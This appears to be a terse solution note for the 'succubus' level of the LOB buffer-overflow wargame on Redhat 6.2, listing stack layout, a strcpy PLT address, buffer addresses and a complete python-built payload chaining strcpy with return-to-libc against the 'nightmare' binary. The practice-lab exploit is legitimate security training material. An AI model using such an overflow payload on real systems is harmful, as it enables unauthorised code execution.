LOB Redhat 6.2 - succubus

succubus - PLT

Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]

strcpy(PLT) : 0x8048410

buffer : 0xbffffa90

strcpy_dest : 0xbffffac0
strcpy_source : 0xbffffa90

Payload : ./nightmare `python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*32 + "\x10\x84\x04\x08" + "AAAA" + "\xc0\xfa\xff\xbf" + "\x90\xfa\xff\xbf"'`

Using strcpy + RTL